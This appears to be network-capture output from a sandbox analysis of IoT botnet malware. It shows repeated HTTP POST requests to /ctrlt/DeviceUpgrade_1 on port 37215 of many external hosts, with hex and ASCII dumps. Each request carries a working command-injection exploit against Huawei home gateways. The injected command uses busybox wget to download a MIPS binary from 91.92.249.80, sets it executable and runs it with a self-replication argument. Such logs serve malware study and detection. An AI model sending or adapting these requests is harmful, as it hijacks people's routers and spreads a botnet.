                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2169192.168.2.2357486157.126.186.14137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.631629944 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2170192.168.2.235377641.161.164.19737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.631629944 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2171192.168.2.235556241.64.145.13537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.631675959 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2172192.168.2.234362691.158.50.19637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.631727934 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2173192.168.2.235361841.215.207.15437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.631748915 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2174192.168.2.2335716172.213.103.8037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.631778002 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2175192.168.2.2355472157.103.189.11237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.631804943 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2176192.168.2.2353320157.227.134.15937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.631824970 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2177192.168.2.235522241.226.58.237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.632103920 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2178192.168.2.2349344197.43.37.3337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.633291960 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
